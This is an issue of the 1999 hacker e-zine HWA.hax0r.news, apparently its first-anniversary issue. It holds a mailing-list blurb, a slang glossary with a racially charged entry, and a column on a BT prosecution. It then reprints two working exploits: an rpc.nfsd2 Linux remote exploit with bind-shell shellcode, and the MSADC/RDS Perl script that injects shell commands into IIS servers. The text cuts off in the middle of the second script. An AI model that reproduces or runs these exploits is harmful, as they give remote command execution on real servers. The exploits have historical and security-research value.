o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi
Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhores
and #403-sec
Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime)
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* This is our Birthday issue! we're ONE as of Nov 13th'99
*
* So dig in to our first anniversary issue and enjoy...
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start =-
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|
_| |_|\__|
_ _
___| |_ __ _ _ __| |_
/ __| __/ _` | '__| __|
\__ \ || (_| | | | |_
|___/\__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--= start =-
03.0 Who is Chris Buckley and why was he busted?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The name Chris Buckley is well known in the British H/P newsgroups but he
has nothing to do with HP, He's just an internet ng junkie. He posted
up to 40 emails a day and took it upon himself to act as BT's "help" guide
on one particular newsgroup hurling insults and the like at hapless newbies
that were actually looking for tech support and help. BT it seems didn't
take too kindly to this action and decided to have his account pulled, in
the process of tracking down his account it was discovered that he was indeed
using 'borrowed' accounts and a 800 number to access the net that he had no
right to be using, hence his downfall and a visit by BT security and the local
Police. Durzell picks up on the story .... - Ed
From http://www.barrysworld.com/news/columns.asp?Author=6&Category=6
Contributed by Abattis
When anonymity is no defence Sunday, November 14, 1999, 03:44
The Internet as it stands today is an almost unimaginable concept. If
someone were to come up to me in the street (assuming of course that I`d
never heard of the `Net) and said I could speak to anyone in the World,
`go` anywhere I liked, do pretty much whatever I wanted from the relative
sanctity and seclusion of my bedroom, I`d never have believed them.
The fact that this supposed unreal concept is an everyday reality to
myself and millions of others is a testament to how far technology has
taken us in the past few years. The inherent problem however with the `Net
in its existing incarnation is that for many of us it takes on a form that
is quite different from everyday life. Because we are so isolated and
protected from this mythical World out there, a fundamental sociological
safeguard is missing. Whereas many of us know the divide in everyday life
between right and wrong, lawful and unlawful acts - these same principals
are often jaded or even non-existant on the Internet. Out there the
perception among the masses is that the likes of warez`ing (i.e. to
download commercial material) software is `the done thing`, it`s not
really stealing, noone gets hurt. Likewise insulting others openly isn`t
`real`, it`s only text after all - it`s not the same as RealLifeTM really.
However hardened one`s resolve is against abusing others, illegally
downloading software and other such activities is all too easy to slip
into, after all noone can doubt that it`s far easier for many people to
hide behind a screen and email your thoughts and opinions freely without
consequence than it is to attempt to make the same observations in person,
especially if they have a controversial nature.
Most of us are fortunate to be able to look upon our Internet existences
to date retrospectively, to see where perhaps we made errors of judgements
or indeed partook in acts that at the time seemed to be `part of the `Net
experience`, that are in actual fact illegal, costly and damaging to
individuals and/or companies whom they affect. For a minority however this
luxury is not available to them, people who realised too late the
respective `errors in their ways`..
One such individual is Chris Buckley.
Chris Buckley is somewhat unique in the Internet online community, being
someone who is both unknown to a faction of the community, yet synonymous
to the rest. His notoriety stems mainly from activities on Usenet
(Internet newsgroups) together, more recently, with his usage of several
highly publicised BT 0800 staff/engineer numbers. What differentiates Mr
Buckley from the thousands of others that had been using these open
staff/engineer numbers however is that for reasons best known to
themselves, British Telecom are proactively seeking prosecution of this
one individual, on charges relating solely to acts he (allegedly)
perpetrated on the Internet. These charges are as follows:
1) At (town name) in the county of (county) on 5th July 1999 knowingly
caused a computer to perform a function with intent to obtain unauthorised
access to the computers running BT Internet. Contrary to Section 1 of the
Computer Misuse Act 1990
2) At (town name) in the county of (county) on and between 1st and 7th
July 1999 sent by means of a public telecommunication system in excess of
100 e-data messages for the purpose of causing annoyance.
Contrary to Section 42 of the Telecommunications Act 1984
3) At (town name) in the county of (county) on 5th July 1999 made a
telephone call for 9 hours 46 minutes and 58 seconds using a public
telecommunications system with the intention of avoiding payment for the
call. Contrary to Section 42 of the Telecommunications Act 1984
As Chris Buckley has rightly stated in correspondance following the
announcement of the charges, this is by no means a token case - it is in
effect a landmark action by the telecommunications bohemeth which, if
successful, could lead to charges being brought against hundreds maybe
even thousands of other `Net users that have used this BT 0800
staff/engineer number illegally. Of course the issue of whether or not the
trial is eventually successful is not the focal point of this entire
issue, moreof the fact that this case marks perhaps the first ever where a
UK company has taken on an individual based solely on activities that in
many people`s eyes would deem to be trivial or circumstantial. After all,
who is to say what is classified as `annoying` e-mail? Can an individual
be expected to pay for a freephone (0800) number that allows him/her to
connect on a regular ISP account?
All these questions will be answered in the trial of Chris Buckley, and I
for one will be awaiting the final outcome with trepidation, as it could
effectively spell the end of the Internet as many of us know it.
@HWA
04.0 rpc.nfsd2 exploit for Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hack.co.za/
/*
* rpc.nfsd2 exploit for Linux
*
* today is 4/07/99 (3 months after 1st version;)
*
* changes in v.2:
* That version can be used for FULL remote exploiting, I changed/added
* two important things:
* - new shellcode: sh on defined port
* - creating dirs via ftp
* Now you can hack box remotely if you have +w via ftp.
* (./3nfsd2 -e /home/ftp/incoming -f /incoming) | nc target 21
*
* author: tmoggie
* greetz:
* DiGiT - bug
* maxiu - help with shellcode
* lam3rZ GrP - :)
*
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"
char shell[255] =
"\xeb\x70\x31\xc9\x31\xdb\x31\xc0\xb0\x46\xcd\x80\x5e\x83\xc6\x0f\x89\x46"
"\x10\x89\x46\x14\x89\x46\x18\xb0\x02\x89\x06\x89\x46\x0c\xb0\x06\x89\x46"
"\x08\x31\xc0\xfe\xc3\x89\x5e\x04\xb0\x66\x89\xf1\xcd\x80\x89\x06\xb0\x30"
"\x31\xdb\x31\xc9\xb3\x0e\xfe\xc1\xcd\x80\x66\xb8\x69\x7a\x86\xc4\x66\x89"
"\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\xb0\x10\x89\x46\x08\xb0\x66\x31"
"\xdb\xb3\x02\x89\xf1\xcd\x80\x31\xc0\xfe\xc0\x89\x46\x04\xb0\x66\xb3\x04"
"\x89\xf1\xcd\x80\xeb\x04\xeb\x60\xeb\x8c\x89\x46\x0c\x8d\x46\x0c\x89\x46"
"\x04\x89\x46\x08\xc6\x46\x0c\x10\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x89\xf1"
"\xcd\x80\x83\xee\x0f\x89\xc3\x31\xc9\x89\x4e\x14\xb0\x3f\xcd\x80\x41\xb0"
"\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xfe\x06\xfe\x46\x04\x88\x66\x07\x88\x66"
"\x0b\x89\x76\x0c\x8d\x46\x09\x89\x46\x10\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
"\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\xe8\x9b\xff\xff";
char next[] = "\xff\x2e\x62\x69\x6e\x2e\x73\x68\x41\x41\x2d\x69";
char mark[] = "\xff\xff\xff";
int port = 31337;
int offset;
void usage(char *prog) {
printf("\nusage: %s <-e dir> [-t target] [-s port] "
"[-f dir] [-u user] [-p pass]\n\n",prog);
printf(" -e dir : real-path to exported direectory\n");
printf(" -t target : target OS\n ");
printf(" 1 - RH 5.2 (default) \n"
" 2 - Debian 2.1\n");
printf(" -s port : shell port, default is 31337\n");
printf(" -f dir : ftp-path to exported directory\n");
printf(" -u : ftp username (default is ftp)\n");
printf(" -p : ftp password (default is ftp@ftp.org\n\n");
exit(0);
}
void main(int argc, char **argv) {
int i,j;
int ftp=0;
char user[255]="ftp";
char pass[255]="ftp@ftp.org";
char buf[4096];
char buf2[4096];
char tmp[4096];
char tmp2[4096];
char exp[255] = "!";
char exp2[255]= "!";
char addr[] = "\x06\xf6\xff\xff\xbf";
while (1) {
i = getopt(argc,argv,"t:e:s:f:u:p:");
if (i == -1) break;
switch (i) {
case 'e': strcpy(exp,optarg); break;
case 's': port = optarg; break;
case 'f': strcpy(exp2,optarg); ftp = 1; break;
case 'u': strcpy(user,optarg); break;
case 'p': strcpy(pass,optarg); break;
case 't': switch (j=atoi(optarg)) {
case 1: strcpy(addr,"\x06\xf6\xff\xff\xbf");
break; // debian 1.2
case 2: strcpy(addr,"\x18\xf6\xff\xff\xbf");
break; // rh 5.2
}
default : usage(argv[0]); break;
}
}
if (!strcmp(exp,"!")) usage(argv[0]);
if (ftp == 1) {
// sockets, resolve, connect......
}
*((unsigned short *) (shell + 66)) = port;
offset = strlen(exp);
if (exp[offset-1] != '/') strcat(exp,"/");
offset = strlen(exp);
// 1st directory
bzero(buf,sizeof(buf));
memset(tmp,'A',255);
tmp[255]='/';
tmp[256]='\0';
strncpy(buf,exp,offset);
// make our dirs
if (ftp == 1) {
printf("USER %s\n",user);
printf("PASS %s\n",pass);
printf("CWD %s\n",exp2);
}
for (i=1;i<=3;i++) {
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck! can't create directory!!! : %d\n%s\n"normal,i,buf);
exit(-1);
}
} else {
tmp[255]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
}
// offset direcory, length depends on real-path
memset(tmp,'A',255);
tmp[255-offset]='/';
tmp[256-offset]='\0';
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
exit(-1);
}
} else {
tmp[255-offset]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
// shell directory
memset(tmp,'x',255);
// printf("%d\n", strlen(shell));
if (ftp == 1) strncat(shell,mark,strlen(mark));
// printf("%d\n", strlen(shell));
strncat(shell,next,strlen(next));
if (ftp == 1) i=3; else i=0;
strcpy(tmp+(255+i-strlen(shell)),shell);
// printf("%d\n", strlen(shell));
strncat(buf,tmp,strlen(tmp));
strncat(buf,"/",strlen("/"));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@# shell-dir\n%s\n"normal, buf);
exit(-1);
}
} else {
tmp[258]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
// addr direcotry
memset(tmp,'a',255);
tmp[97] = '\0';
// *((int*)(tmp+93)) = addr;
// if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1
// else {
strcpy(tmp+93,addr);
// }
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@#!@#!$ addrez-dir ^\n%s\n"normal, buf);
exit(-1);
}
} else {
printf("MKD %s\n",tmp);
printf("quit\n",tmp);
}
fprintf(stderr,normal green"Ok\n"normal);
fprintf(stderr,"now you have to do: "bold green \
"rm -rf /path-to-mount-point/A[tab] & \n"
"and: telnet target %d\n\n"normal,port);
}
@HWA
05.0 MSADC/RDS script v2 by rain forest puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hack.co.za/
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
